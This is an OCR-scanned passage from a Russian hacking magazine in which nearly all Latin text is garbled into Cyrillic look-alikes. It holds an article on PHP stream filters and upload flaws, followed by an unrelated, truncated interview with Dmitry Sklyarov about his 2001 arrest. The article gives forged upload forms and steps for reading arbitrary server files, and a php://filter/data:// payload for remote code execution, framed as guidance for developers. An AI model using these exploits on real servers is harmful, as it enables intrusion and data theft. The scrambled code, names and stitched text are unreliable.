1. $іп — точка входа, ресурс, из которого поступают да иные как по 
«цепочке людей, передающих ведро». 

2. $оіЛ — точка выхода, ресурс, в который отдаются обработанные 
данные. 

3. $соп5інпесІ — место, где хранится длина данных, полученных 
фильтром, этотпараметр всегда должен передаваться поссылке. 

4. $сІозіпд — булева переменная, регулирующая получение данных, 
принимаетзначениеТРІІЕ, если считывание данных из входяще- 
го потока закончено. 

Также метод ЛНег должен возвращать одну из следующих трех 
констант: 

1. Р5Р5_РА55_0Ы — данныеуспешнообработаны и переданы в 
точку выхода. 

2. Р5Р5_РЕЕ0_МЕ — ошибки отсутствуют, ноданныхдля передачи в 
$оиЕ нет. 

3. Р5Р5_ЕПР_РАТАІ_ (сіе^аиіі) — произошла ошибка. 

Методы опСгеаІе/опСІозе применяют редко, но лучше включать их в 
код фильтра. Если фильтр оперирует другими ресурсами (например, 
буфером), то это указывается в методе опСгеа^е, вызываемом при 
инициализации фильтра. Метод опСгеа^е должен возвращать РАІ_5Е 
в случае неудачи и ТНІІЕ в случае успеха. Метод опСІозе вызывается 
при завершении работы фильтра (обычно во время закрытия потока). 
Чтобы наш фильтр был доступен, необходимо зарегистрировать его в 
системе с помощью функции зІгеат_ЛНег_гедіз^ег. 



а такие функции во множестве используются для обработки вхо- 
дящих данных. Рассмотрим, например, загрузку файлов на сервер 
стандартными средствами РНР. 



РНЕ ІІРЮАО 



Обычно для загрузки файлов на сервер используют либо функ- 
цию тоуе_ир1оас1есМПе, либо функцию сору. Довольно часто 
пользователям разрешается загружать графические изображе- 
ния, картинки, аватары и т. д. При этом разработчики предусма- 
тривают разнообразные процедуры проверки загружаемых 
файлов, чтобы вместо картинки никто не загрузил полноцен- 
ный веб-шелл. Чтобы понять, какая проверка действительно 
эффективна, а какую легко можно обойти, рассмотрим процесс 
обычной загрузки файла в подробностях. 

Итак, для отправки пользовательского файла используется 
НТМЬформа, например такая: 

<-Рогт асЕіоп=ир1оасІ . рМр те1:ІіосІ=ро5І: 
епс1:уре=ти1-Еіраг1:/-Рс>гт-сІа1:а> 
сіприі: 1:уре=б1е пате=ир1оасЖ1е> 

<±при1і •Еуре=5иЬті'Е ѵа1ие=1)р1оасІ> 

</-Рогт> 

Когда мы выбираем файл для загрузки у себя на компьютере и 
нажимаем кнопку ІІрІоасІ, удаленному серверу отправляется Р05Т- 
запрос, в котором обязательно содержится хедер СопЕепЕ-Туре 
следующего вида: 

СогтЕеггЕ-Туре: ти11:іраг1:/-Рогт-сІа1:а ; ЬоипсІапу= 



2421143106617 



А сами Р05Т-данные имеюттакой вид: 

2421143106617 

Соп1:еп1:-0І5ро5І1;іоп : -Рогт- сІ а'Еа ; пате="ир1оасИй1е" ; 
бІепате^'ІіеІІо.'ЕхІ:" 

Соп-Ееп-Е-Туре: -Еех-Е/рІаіп 



<?рІір есЕю 'Неііо! ! ! ' ; ?> 

2421143106617 -- 



Как несложно догадаться, при заполнении формы мы выбрали 
файл ЬеІІо.ЕхЕ, который содержит «<?рМр есбо 'Неііо!!!'; ?>». 
Когда РНР-скрипт на удаленном сервере получает этот запрос, 
интерпретатор РНР создает на сервере временный файл с именем 
типа рЬр5еІІт44, в который и попадает содержимое ЬеІІо.ЕхЕ. Этот 
временный файл хранится до завершения работы скрипта, а потом 
автоматически удаляется (подробнее о временных файлах в РНР 
читай в предыдущем номере нашего журнала). Также создается 
массив $_РІІ_Е5 следующего вида: 

Аггау ( 

[иріоасібіе] ^>і Аггау ( 

[пате] => Ііеііо.-Ехі: 

[■Еуре ] = > 1=ех1=/р1 а і п 

[-Ет р пате] => /1:тр/рІір5еІІт44 

[еггог] => 0 
[5І2е]^> 33 

)— 

Тут важно понимать, что $_РІІ_Е5[ир1оасНй1е][1:уре] совпадает с 
элементом СопЕепЕ-Туре, который формируется на стороне клиента. 
Обычно браузер автоматически заполняет этот элемент в зави- 
симости от выбранного файла, поэтому некоторые веб-мастера, 
наивно надеясь обезопасить себя от загрузки зловредных РНР- 
скриптов, проводят только воттакую простенькую проверку: 

$_РИЕ5[ , Чп1е"] ["~Еуре"] == "іта§е/§і-Р" 

При этом они забывают, что любой элемент пользовательского 
запроса можно легко изменить, то есть обойти такого рода фильтр 
очень просто. Для проверки также довольно часто используется 
функция деЕітадезігеО. Конечно, это более эффективно, но не стоит 
забывать, что пользователь с легкостью может изменить ЕХІР-теги 
изображения, поэтому такой фильтр также легко можно обойти. 
Остается открытым вопрос о том, в каком виде файл сохраняется на 
сервере. Например, в зависимости от настроек веб-сервера файл 
ріс.рЬр.туехЕ вполне может быть обработан как РНР-скрипт. Таким 
образом, безопасный аплоад файлов — это не только проверки в 
скриптах, но и грамотно решенный вопрос о местонахождении и 
обработке загруженных файлов. При этом также не стоитзабывать и 
об особенностях самого РНР, связанных с массивом $_РІІ_Е5. 



УЯЗВИМОСТИ ЗАГРУЗКИ ФАЙЛОВ 



Первая уязвимость, о которой я бы хотел рассказать, — это 
недостаточная обработка имени файла при его загрузке. Эта 
уязвимость помечена на сайте Ьидз.рЬр.пеЕ как приватная, тем 
не менее если постараться, все-таки можно найти ее описание. 

:) Баг заключается в том, что если имя файла начинается со 
слеша или бэкслеша и больше слешей/бэкслешей не содержит, 
то оно проходит как есть в элемент массива $_РІІ_Е5[ир1оасІ61е] 
[пате]. Таким образом, вместо того чтобы загрузить файл в теку- 
щую директорию скрипта, мы загрузим его в корневую директо- 
рию веб-сервера. На машинах под управлением ІІпіх-подобных 
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систем мы не сможем ничего загрузить в корневую папку из-за 
нехватки прав. Но вот на ѴѴіпсІоѵѵз-машинах вполне можно про- 
вернуть такой финтушами. По ссылке в сносках ищи обучающее 
видео из блога первооткрывателя этого бага. 

Вторая уязвимость более существенна. Она обусловлена не- 
правильной обработкой ключей в массиве $_РІІ_Е5. Впервые о ней 
я узнал от человека под ником Оѵѵагаг с форума гсіоі.огд . Вместе с 
ВІаскРап, еще одним камрадом с этого форума, они провели тесты, 
раскрывающие суть этого бага. С их разрешения я расскажу о нем 
более подробно. Итак, пусть у нас есть мультифайловая загрузка, 
реализуемая с помощью функции сору: 

-Рогеасб ($_РІІ.Е5[ "біе" ] [ "Іітр пате" ] ав $кеу => $пате) 

{ 

есбо "Біге: " .$ РИЕ5["б1е"] ["зіге"] [$кеу] . "<Ьг/>\г\п" ; 
есбо "1:тр пате:". 

$_РИЕ5["б1е"] ["1=тр пате"] [$кеѵ] . "<Ьг/>\п\п" ; 



іб($_РІІ.Е5["б1е"] ["зіге"] [$кеу]>0 && 

$_РІІ_Е5[ "б1е" ] [ "БІіе" ] [$кеу]<1024) 

{ 

есбо "Ок< Ьг/>\г\п" ; 

со р у($_РИЕ5["б1е"] ["Іітр пате"] [$кеу] . ' 1=е5І= .1=х1= ' ) ; 

} 

} 

Это позволяет не только загружать файлы, но и читать произ- 
вольный контент с сервера! Если мы отсылаем файлы на сервер 
при помощи воттакой вот формы: 
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Сложный метод опСгеаІе в пользовательском фильтре 



<бопп ас1:іоп="ир1оасІ . рбр" те1:ІіосІ="Р05Т" 
епс1:уре="ти11=ірап1:/бопті-сІа1:а"> 

<іпри 1= 1:уре="Н ісІсІеп" пате="МАХ _Р ИЕ_5І2Е" 
ѵ а1ие="1ѲѲ00000 "> 

< іприі: Туре^ТбІе" пате="б1е[1:тр_пате]ТТ> 
<іпри1: Туре="б1е" пате="б1е[5І2е] [ "> 
<іпри1: Туре="б1е" пате="бЩпате] ["> 



<іпри1: 1:уре= " зиЬтіІ: " ѵа1ие="5 иЬті1 :"> 

</богт> 

— то в массиве $_РИЕ5 создаются элементы следующего типа: 

$_РІІ_Е5["б1е" ] ["1:тр_пате" ] [" [пате" ] 

Функция сору вполне успешно воспринимает эти элементы: 

$_РІІ_Е5["б1е"] [ "1:тр_пате" ] [$кеу] 

Таким образом, мы получаем возможность для манипулирования 
произвольными параметрами в $_РИЕ5 (ниже я покажу, что такое 
поведение характерно не только для функции сору). Приведу про- 
стой пример, чтобы более детально разъяснить суть уязвимости. 

Если на удаленном сервере имеется вышеуказанный скрипт 
(назовем его иріоаб.рбр), а у нас на компьютере есть соответ- 
ствующая НТМЕ-форма, то для чтения исходника скрипта зесгеі. 
рбр, который находится в той же директории, что и иріоасі.рбр, 
нам необходимо и достаточно создать у себя на жестком диске 
два файла: 

1. Файл с именем зесгеТрбр, содержимое которого не столь важно 
(пусть, к примеру, это будет «<?рбр ?>»). 

2. Файл с совсем простым именем, допустим «1». Его содержимое 
будет состоять из одного символа «1 ». 

В качестве имени второго файла выбрано число, чтобы он смог 
пройти следующую проверку: 

$_РІІ_Е5[ "б1е" ] [ "зііе" ] [$кеу] >0 

Теперь открываем вышеуказанную форму в браузере и в поле 
«П1е|Ттр_пате][» выбираем файл зесгеЕрбр, а в остальных 
полях — файл с именем «1». Затем жмем на сабмит и видим, что 
в той же директории появился файл ІезихЕ Он представляет 
собой точную копию файла зесгеі.рбр, но имеет расширение 1x1, 
и значит, мы легко можем просмотреть его в браузере. 

Кстати, чтобы просмотреть файл из произвольной директории, 
нужно изменить поле СопІепМуре (то, о котором я говорил выше). 

В этом поле мы можем указать путь к любому файлу на сервере, и 
этот файл успешно скопируется в ІезихЕ Но и это еще не все! 



«БЕЗОПАСНАЯ» ЗАГРУЗКА ФАЙЛОВ НА СЕРВЕР 



Как отмечено выше, в основном загрузка файлов осуществляется 
с помощью функций тоуе_ир1оас1есМПе и сору. Однако существуют 
и другие варианты для выполнения этой сложной и ответственной 
задачи. Один из таких вариантов (он, кстати, более предпочтите- 
лен, если речь идет о загрузке только изображений) — исполь- 
зование функций ітадесгеаЫгот*/ітаде*. Так как эти функции 
работают только с изображениями, то ничего, кроме картинки, мы 
им подсунуть не сможем. Например, скрипт 

$іт§ = іта§есгеа1:ебгот]ре§($_РІІ_Е5 [ "біепате" ] [ "1:тр_пате" ] ) ; 
іта§е]'ре§($іт§ і "иріоасіз/" .$_РІІ_Е5["б1епате"] ["пате"] ) ; 

загружает на сервер только картинку в формате ЭРЕ6, при этом 
полностью уничтожая все находящиеся в ЕХІР-тегах данные. Таким 
образом, злоумышленик никак не сможетзалить на сервер что-то 
опасное. Но даже в таком, казалось бы, надежном методе есть 
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свои подводные камни. Сразу хочу заметить, что найти в реальных 
скриптах приведенные ниже примеры будет непросто, однако все 
они имеют право на жизнь. 

Итак, главная особенность функций ітадесгеаіеітопп* заклю- 
чается в том, что они не только работают с графическими файла- 
ми, но и вполне себе поддерживают описанные выше потоки! Это 
открывает, к примеру, прекрасную возможность хранить картинки 
не на сервере, а в базе данных. Таким образом, если пропустить 
картинку через Ьазе64_епсос1е и сохранить в БД, то потом такое 
изображение можно будет вывести на экран, например, воттак: 

$дре§іітіа§е =_ іта§есгеа1:е-Рготдре§( 

м сІа1=а :// іта§е/дре§;Ьа5е64. " . Ьаве64_епсосІе( 

$зд1 гезиИ: аггау [ ' іта^есіаііа ' ] ) ) ; 
іта§едреЕ($дре§іта)Е;е) ; 

Эта особенность может оказаться довольно полезной, так 
как грузить картинки в базу намного безопасней, чем в файлы. 
Например, разработчикам не нужно думать о правах доступа к 
директориям с картинками, о доступности этих директорий из 
веба и о других подобных вопросах. Однако то, что функции вос- 
принимают потоки, изредка приводит к довольно неожиданным 
резул ьтатам. 

Предположим, что у нас есть веб-приложение, которое имеет 
описанный выше уязвимый фильтр, а также осуществляет мульти- 
файловую загрузку, но не с помощью функции сору, а с помощью 
функции ітадесгеа*е1тот*/ітаде*, например такой: 

-Рогеасб ($_РИЕ5[ "біе"] [ "Іітрпате" ] аз $кеу => $пате) { 
есбо "Біге: " .$_РІІ_Е5["б1е"] ["зіге"] [$кеу] . "<Ьг/>\г\п"; 
есбо "Іітр пате : " . $_РІІ_Е5[ "б1е" ] [ "Ііт р пате" ] [$кеу] /ЧЬг/>\г\п" ; 



$іт ^ = ітаеесгеа1іе-Гго ітпре^( 

$_РІІ_Е5[ "б1е" ] [ "1:тр_пате" ] [$кеу] ) ; 

іта§едре§($іт§, ' ,/пеы_' .$кеу. ' о р §' ) ; 

Іта^еРе5І:гоѵ($іт^ ; 

} 

Создаем на сервере файл Ідрд с произвольным содержимым, 
выбираем его во всех полях формы, которую я приводил выше, и 
отсылаем РОБТ-запрос с модифицированным полем СопІепМуре: 

рбр : //б11іег/геасІ%ЗсІсопѵег1і . 1і§Іі1іпіп§_1іетр1а1іе_б11іег/ 
ге5оигсе%ЗсІ 

сіаііа ://1:ех1:/р1аіп%ЗЬЬа5е64 л еуІІ§аІлІУ§сНЗрЬпК-РсібрЬт1-Р22Ѵ0Х2 
Р5ЬС? рК$А1-Р0 

Таким образом, мы можем выполнить произвольный код на сер- 
вере! Курьез этого примера состоит в том, что точкой входа служит, 
казалось бы, вполне безобидная функция ітадесгеаіеітопщред. Од- 
нако стоитучесть, что возможность выполнять произвольный код 
появляется только благодаря уязвимому фильтру, а такие фильтры 
встречаются далеко не на каждом шагу. 
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«Приватная» уязвимость РНР 



НОВАЯ ЖИЗНЬ СТАРЫХ БАГОВ 



В конце 2009 года в РНР уже был найден похожий баг, связанный с 
неразберихой в ключах глобальных массивов. 

По задумке разработчиков, в именах 6РС-переменных не должны 
содержаться символы « » (пробела], «.» и «[» (они могут интерпрети- 
роваться как элементы специального синтаксиса массивов]. Однако 
версии РНР того времени допускали нарушение логики в образовании 
таких имен. Чтобы воспроизвести баг, набросаем специальную НТМІ_- 
форму: 

<-Рогт ас1:іоп=> 

< іприіі пате="§оосІѵаг .["> 

< іприіі пате="^оосІаггаѵ[Тоо] "> 

<іпри1: пате="ЬасІѵаг[ . ["> 

<іпри1і 1іуре=5иЬті1і> 

</Тогт> 

Также напишем скрипт іпбех.рНр для вывода результата на экран: 
<?рІір 

ргіп1і_г($_СЕТ) ; 

?> 



Ожидаемый результат: 

Аггау 

( 

[§оос!ѵап ]_ => 

[^оосіаггаѵ] => Аггау 

[-Тоо] ■> 



[Ьасіѵап ] => 

)_ 

Полученный результат: 

Аггау 

( 

[§оос!ѵаг ]_ => 

[§оосІаггау] => Аггау 

[Тоо] => 

) 

[ЬасІѵаг_ . [] => 

)— 

Как видишь, логика в построении массива явно нарушена. Очень 
похожее нарушение логики лежит и в основе уязвимости в $_РІІ_Е5, 
описанной в статье. 



ВМЕСТО ЗАКЛЮЧЕНИЯ 



В последнее время багокопатели стали все чаще устремлять 
свои пылкие взоры на механизмы работы с файлами в РНР. В этой 
статье я постарался доходчиво описать очередную порцию таких 
багов, а также привел малоизвестные факты о фильтрах и потоках. 
Надеюсь, что новые знания помогут веб-разработчикам грамотно, 
красиво и, главное, безопасно кодить свои приложения. □□ 
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СОѴЕК 5Т0РѴ 



ДМИТРИЙ СКЛЯРОВ 



ЧЕЛОВЕК, 



КОТОРЫЙ поссорился с 





Интервью с Дмитрием Скляровым 




□ НАЧНЕМ С ОЧЕВИДНОГО И ПРОСТОГО ВОПРОСА — С 
ЧЕГО И КАК НАЧИНАЛАСЬ ВАША КАРЬЕРА, ПОЧЕМУ 
ІТ, КРИПТОГРАФИЯ, ПРОГРАММИРОВАНИЕ? 



Мои родители оба закончили МВТУ (прежнее название 
МГТУ им. Баумана. — Прим. ][), факультет приборострое- 
ния, кафедру П6. Тогда машины были другие — занимали по 
100 кв. м. Папа впоследствии проработал в МВТУ более 20 лет 
на основной должности начальника вычислительной машины. 
Так что я с младых ногтей был приобщен к вычислительной 
технике. Дома валялись перфокарты, в макулатуру в школе 
сдавалась АЦПУ-шная бумага... Школа, кстати, была без 
какого-либо уклона, но в последние два года у нас был очень 
хороший учитель математики. К тому же нам повезло — с 
шестого класса у нас началось профессиональное образование. 
Один день в неделю был отведен на совершенствование 
профессиональных навыков. Пока две трети класса практико- 
валась на станках завода «Салют», другую треть отправляли на 
учебно-производственный комбинат, связанный с компьютера- 
ми. Раз в неделю мы проводили там шесть часов, нам читали 
лекции, были какие-то практические занятия... Начинали мы с 
ПВМ «Агат», а в последний год учебы на этом комбинате 
появились даже персоналки. В то время позволить себе 
компьютер дома было, конечно, нереально. То есть «Агат» уже 
продавался в магазинах и стоил порядка 4,5 тысяч рублей, в то 
время как «Жигули» стоили около 6 тысяч. 

В 91-м я окончил школу и собрался поступать в институт. 

Мне хотелось, чтобы вокруг было как можно больше компью- 
теров, — это была главная моя цель. Я очень хотел попасть на 
кафедру систем автоматизированного проектирования, там все 
на компьютерах. В итоге — Бауманка, родной вуз. Правда в том 




СОѴЕВ 5Т0ГСѴ 



году поступали не на кафедру, а на факультет, а 
распределение по кафедрам происходило уже 
после первого курса. Я, естественно, попал со- 
всем не туда, куда хотел: меня распределили на 
кафедру сопротивления материалов. И хотя спустя 
семестр я все же перевелся, я до сих пор считаю, 
что из всех кафедр факультета сопромат — самая 
сильная кафедра, то есть там лучше всего учат. Но 
еще со школьных лет я понял, что мне нравится не 
столько программировать, сколько разбираться, 
как устроены программы, искать ошибки. 



геоинформатикой — писал программы, которые 
автоматизировали работу по созданию электрон- 
ных карт. Позже некоторое время разрабатывал 
аналогичное ПО для американцев. Это все было 
через институт, то есть через кафедру. После 
окончания института думал, куда мне пойти, и как 
раз тогда (это был 97-й год) открылась кафедра 
информационной безопасности. Я уже понимал, 
что безопасность мне нравится, и до сих пор 
считаю, что это одна из самых динамичных 
областей ІТ. Я пошел туда в аспирантуру. 
Диссертацию, правда, до сих пор так и не 
защитил, хотя она написана на 80 %. Называется 



Еще параллельно с учебой в институте я 
оаботал в компании, которая занималась 



А ПОСЛЕ 
ИНСТИТУТА? 



Е1сот50^, которая находится в Москве. Я списался 
с ними, рассказал о том, что у меня есть, и 
спросил, заинтересует ли это их. Мне ответили: 
«Приходи, поговорим». Изначально я хотел 
попросить за свой софт немножечко денег и 
сказать до свидания. Но мне предложили работать 
на регулярной основе, потом был испытательный 
срок длиной полгода... А потом меня взяли в штат. 

ТО ЕСТЬ ОСНОВНЫМ НАПРАВЛЕНИЕМ 
РАБОТЫ Е1_С0М50ГТ СНАЧАЛА БЫЛО 
ВОССТАНОВЛЕНИЕ ПАРОЛЕЙ? 

д Сначала было восстановление паролей, а 

М уже потом появились и смежные направле- 
ния. Основными покупателями софта для 
раззѵѵогсі гесоѵегу, конечно, были домашние 
пользователи. Их много, их легко найти, они 
фактически приходят сами. Забытый пароль — 
это очень частая ситуация. Потом появились 
продукты, связанные с восстановлением данных. 
К примеру, у нас есть замечательный продукт ЕГ5 
Ресоѵегу. Есть продукт для аудита — фактически 
он выполняет то же восстановление паролей, 
только в масштабе Асііѵе сіігесіогу. Недавно мы 
вышли на рынок так называемой сотриіег 
Ьгепзісз. Это тоже восстановление паролей, но 
уже не для домашних пользователей, а для 
правоохранительных органов, которые тоже 
часто в этом заинтересованы. 



□ 



КОГДА Я НАТКНУЛСЯ НА ЧЕТЫРЕХ ЧЕЛОВЕК, 
КОТОРЫЕ ПРЕДСТАВИЛИСЬ АГЕНТАМИ ФБР, 
Я СНАЧАЛА РЕШИЛ, ЧТО ЭТО ИГРА 



она «Метод анализа программных средств 
защиты электронных документов». Тот самый 
доклад, с которым я ездил на йекоп в 2001 
году, — это как раз кусок диссертации. Сейчас я в 
Бауманке совместитель — читаю одну лекцию в 
неделю, веду дипломников — и мне хватает. У 
нас есть такая штука — курс по выбору. Студенты 
вольны выбирать, на что ходить. Я читаю 
пятикурсникам курс, который называю «Инже- 
нерное введение в информационную безопас- 
ность». У меня сложилось впечатление, что, 
доучившись до пятого курса, многие студенты не 
понимают, чем они занимаются. Я получаю 
удовольствие от общения с молодым поколением 
и работаю там совсем не ради зарплаты. 




РАССКАЖИТЕ, ПОЖАЛУЙСТА, КАК 
ПОПАЛИ В ЕІ_С0М50РТ. 



д Я просто написал кусок кода для своих нужд. 
М Один мой друг потерял доступ к свой базе 
Асеева, попросил меня помочь. Я посидел, 
разобрался и... помог. В итоге у меня получился 
код, который мог бы пригодиться другим людям, 
но я не умел продавать программы. Тогда-то я и 
узнал, что существует такая компания — 



КАК РАЗ ХОТЕЛОСЬ ЗАДАТЬ ВОПРОС О 
ПРАВООХРАНИТЕЛЬНЫХ ОРГАНАХ. :) 

д 0, у нас на стене висит куча благодарно- 
М стей, в том числе и от правоохранительных 
органов самых разных стран мира. Нашему 
генеральному директору как-то вообще прислали 
бумагу, где говорилось, что он является почетным 
помощником шерифа штата Техас. Еще в 90-е 
годы полиция Техаса арестовала человека по 
какому-то страшному обвинению, и на его 
компьютере обнаружили зашифрованные файлы. 
Полиция обратилась в ЕІсотвоЙ, и мы предоста- 
вили им программу. В расшифрованных файлах 
были обнаружены доказательства вины 
задержанного. 

НО ВЕДЬ БЫВАЕТ, ЧТО ЛЮДИ «ЗАБЫ- 
ВАЮТ» ПАРОЛИ ОТ ЧУЖИХ ДАННЫХ. 
Да, конечно, бывает и такое, но... К 
примеру, у нас недавно вышел инстру- 
ментарий для исследования телефонов 
компании Арріе, для ЮЗ (для любых устройств, 
кроме іРЬопе 45 и іРасІ2). Мы были первыми в 
мире, кто сделал подобное. Мы не продаем его 
всем подряд, открытой продажи нет вовсе, зато 



□ 

в 



□ 



этот продукт пользуется спросом у представите- 
лей госструктур. Таким образом, организация 
должна представить доказательства того, что 
имеет отношение к правоохранительным 
органам. 



к: 

РОССИИ КОПАЕТСЯ В ИХ ПРОДУКТАХ, И НЕ 
ПРЕПЯТСТВУЮТ ЭТОМУ? ОБ АБОВЕ ПОКА 
УМОЛЧИМ. 



АРРЬЕ И ДРУГИЕ ПРОИЗВОДИТЕЛИ НЕ 
ВОЗРАЖАЮТ, ЧТО КОМПАНИЯ ИЗ 



Помимо нас, подобные продукты сейчас вы- 
пускают еще три или четыре компании, 
известные на мировом рынке сотриіег Гэгепвісз. 
Производители телефонов, как ни странно, не 
против. Все же это сотрудничество с правоохра- 
нительными органами, помощь закону... Из Арріе 
к нам не обращались ни разу, претензий не 
предъявляли. Вообще, что касается претензий, 
чаще бывает наоборот. 



□ 



ЗАДАЧУ ОТНОСИТЕЛЬНО БЕЗОПАСНО- 



СТИ РОГ ВАМ ПОСТАВИЛИ В 
ЕБС0М50ГТ ИЛИ...? 



Нет, идея с рсК принадлежала мне. Я 
пришел и предложил заняться этим 
форматом. Мне сказали: «Ну, если интересно, 
займись». У нас в этом смысле уникальная 
компания — не существует жесткого графика 
разработки софта. Нет внешнего заказчика, 
который диктует нам сроки. 



□ 



ИЗ ЭТОЙ ИДЕИ И РОДИЛСЯ 



незабвенный аоѵаысео евоок 

РР0СЕ550Р, ИЗ-ЗА КОТОРОГО ВАС 
АРЕСТОВАЛИ В 2001 ГОДУ НА ОЕГСОЫ? 



В общем, да. По сути, при моем участии 
была разработана программа, которая 
позволяла снимать защиту с легально купленных 
р 6 ^-документов, в том числе с электронных книг. 
Она была выпущена в 2001 году. У нас в России 
на тот момент действовал закон, согласно 
которому любой человек имел право легально 
сделать одну резервную копию легально 
приобретенной продукции, не сообщая об этом 
правообладателю. То есть, создавая этот продукт 
в России, мы ничего не нарушали. Потом мы 
начали продавать его в США. Это как раз было за 
пару недель до моей поездки в Штаты на йекоп. 
За это время было куплено, если я не ошибаюсь, 
всего 12 или 20 копий программы. Спустя меньше 
недели с начала продаж наш провайдер, у 
которого мы хостились, известил нас о том, что к 
нему предъявляет претензии компания АбоЬе. 

Мы прекратили продажи. 

Я полетел на Беіхоп, спокойно сделал там 
доклад об АбѵапсесІ еВоок Ргосеззог, все было 
хорошо. Но через два дня, когда я уже вышел 
из номера, чтобы ехать в аэропорт, меня встре- 
тили сотрудники ФБР и вежливо предложили 
проехать с ними. 



□ 



РУКИ НЕ ЗАЛАМЫВАЛИ?:) 
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подан в Калифорнии. Соответственно, суд тоже 
должен был состояться в Калифорнии. И пока я 
не в Калифорнии — я не в тюрьме, я в транзите. 
Информация о том, что я в тюрьме, недоступна, 
а информацию о заключенных, находящихся в 
транзите, не выдают в принципе. В итоге меня 
все-таки нашли через два дня. 



□ НО ВЫ СИДЕЛИ НЕ ТОЛЬКО В ВЕГАСЕ, 
ВЕРНО? КАКИМ БЫЛ «ОПЫТ ОБЩЕ- 
НИЯ» С АМЕРИКАНСКИМИ ТЮРЬМАМИ? 



д С транспортировкой вообще было весело. 
М По закону человека, который находится в 



транзите, нельзя держать в одной тюрьме дольше 
21 дня. Его могут перевозить из одной тюрьмы в 
другую и только потом привезти туда, куда он 
должен попасть в конечном итоге. Сколько 
времени должна занимать транспортировка, 
никто не регламентирует. Я провел 1 1 дней в 
Лас-Вегасе, после этого меня самолетом для 
заключенных отправили в Оклахому, в федераль- 
ную пересыльную тюрьму. Она построена прямо 
на краю летного поля, то есть самолет гейтуется 
прямо в нее. Сама тюрьма — это пять комнат с 
телевизорами, микроволновая печка, машина 
для изготовления льда, много еды... в общем, 
почти отель. :) В Оклахоме я провел неделю, 
после чего меня самолетом транспортировали в 
Калифорнию, в Сан-Хосе. 

Что касается тюрем, то до попадания в амери- 
канскую тюрьму я успел поработать в стройотряде 
и побывать на сборах в армии. Так вот, в амери- 
канской тюрьме комфортнее, чем в стройотряде 
и армии. Чтобы охранник бил заключенного без 
повода — я подобного и близко не видел. Белого 
братства, черного братства — тоже... в Лас- 
Вегасе половина заключенных вообще мекси- 
канцы, они испаноговорящие. 



Заламывали, только... Понимаете, на 
конференции существует огромное 
количество игр, связанных с тамошней полицией. 
Одна из них — 5роІ 1Ье іед (Засеки федерала). На 
конференции действительно присутствуют 
федеральные агенты (разумеется, скрытно), и в 
ее ходе по вопросами и ответам из зала нужно 
вычислить человека, который является 
федералом, и каким-либо образом на него 
указать. Когда я вышел из номера и наткнулся на 
четырех человек, которые представились 
федеральными агентами, я сначала решил, что 
это продолжение какой-то игры, хотя конферен- 
ция на тот момент уже закончилась. Попытался 
их обойти. Один из них остановил меня, схватив 
за запястье, показал мне жетон, и я понял, что 
никуда не побегу, сдался властям. 



□ 



РАССКАЖИТЕ, ЧТО БЫЛО ДАЛЬШЕ. 



ВЕДЬ ТОГДА ПОЛУЧИЛАСЬ ОЧЕНЬ 
ГРОМКАЯ ИСТОРИЯ, ВАС ПОЧТИ МЕСЯЦ 
ПРОДЕРЖАЛИ В ТЮРЬМЕ, БОЛЬШЕ 
ПОЛУГОДА НЕ ДАВАЛИ УЕХАТЬ ИЗ ШТАТОВ. 



А 



Федеральные агенты привели меня обратно 
в номер, осмотрели мой чемодан и очень 



удивились, когда обнаружили, что у меня с собой 
нет ноутбука. Дело в том, что со мной были другие 
ребята, которые после конференции полетели в 
другой город в Штатах. Ноутбук был не мой, я 
сделал с него доклад, отдал им, и они уехали. 
Фэбээровцев это разочаровало. Хотя никакого 
криминала на лэптопе он бы все равно не нашли. 

Потом меня отвезли в здание местного суда 
в Лас-Вегасе. В Штатах нет камер предвари- 
тельного заключения и нет мест для постоянной 
«отсидки». Все объединено, так как большин- 
ство людей выходит под залог еще до того, как 
попадает в камеру. Меня отказались выпускать 
под залог: был велик риск «побега», ведь к США 
меня ничего не привязывало. В результате меня 
оставили в тюрьме Лас-Вегаса, в которой я про- 
вел 1 1 дней. А дальше началось самое забавное. 
Оказывается, Андрей Малышев — еще один наш 
сотрудник, который был со мной и присутствовал 
при моем аресте, сразу позвонил в Москву, в 
головной офис, и сообщил, что меня арестовали. 

В Москве всех поставили на уши. Консульство 
послало запрос в тюрьму, чтобы узнать, действи- 
тельно ли меня в ней содержат. Те ответили: 

«Нет, такого нет». Оказывается, американская 
система, она очень хитрая. Иск против меня был 



□ 



А ПОЧЕМУ ПРОДОЛЖАЛОСЬ ДЕЛО, 



ЕСЛИ АБОВЕ ОТОЗВАЛА СВОИ 
ПРЕТЕНЗИИ? 



д Да, за то время, пока меня везли в Сан-Хосе, 
м АбоЬе успела отказаться от своих претен- 



зий. Но «машина» уже была запущена — меня 
обвиняли в уголовном преступлении, истцом 
выступал не АбоЬе, а государство. АбоЬе просто 
подала жалобу, ну, так они говорят. Соответствен- 
но, государство сказало: «Нет, дело мы закрывать 
не будем, человек сидит, вот и пусть сидит». Обще- 
ственное мнение явно было на моей стороне, по 
всему миру начались манифестации. 



А В ЧЕМ, СОБСТВЕННО, ВАС 
ОБВИНЯЛИ? 



* В число обвиняемых по делу, помимо меня, 
М попал и ЕІсотзоИ А меня обвиняли в том, 
что я «извлекал выгоду из распространения 
запрещенной программы» и «продвигал на 
рынок запрещенную программу». Я ничего этого 
не делал. Я ее разрабатывал. Я не являлся 
совладельцем компании, получающим прибыль, 
не был ответственным за рекламу. Но был один 
связующий пункт — «сговор». Прокуратура 
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решила, что я нахожусь в сговоре с компанией. 
На резонный вопрос о том, как подчиненный 
может находиться в сговоре со своим руковод- 
ством, прокуратура заявила, что я, вероятно, 
состою в сговоре с компанией и с третьими 
лицами. С какими именно лицами, прокуратура 
отказалась говорить до суда. Таким образом, все 
обвинения против меня строились только на 
предположении о сговоре. 



ВАС В ИТОГЕ ВСЕ ЖЕ 
ВЫПУСТИЛИ ПОД ЗАЛОГ? 



Да, во время второго слушания (в Сан-Хосе) 
меня выпустили под залог в 50 тысяч 
долларов, который заплатил ЕІсотзоИ Ну и наше 
консульство поручилось, что я не сбегу, куча 
людей пообещала, что они будут на моей стороне. 
Нашлось место, где жить. Первым предложил 
пожить у него американец, которого я до этого 
никогда не знал. Потом появились русские 
ребята, с которыми я тоже был до этого не 
знаком, прекрасные люди. У них я прожил месяц. 
Потом ко мне приехала семья, мы перебрались к 
их друзьям, а через какое-то время сняли 
квартиру, где прожили еще полгода. Раз в 
неделю я должен был звонить в суд и раз в 
неделю являться лично. В общем, арестовали 
меня в середине июля 2001 года, выпустили под 
залог 6 августа, а суд состоялся в декабре 2002 
года. К счастью, мне позволили вернуться в 
Россию (спасибо адвокату Джо Кикеру), но только 
на следующих условиях: дело против меня не 
закрывается, а приостанавливается, я не являюсь 
активным подследственным, однако должен 
явиться по первому требованию суда. Перед 
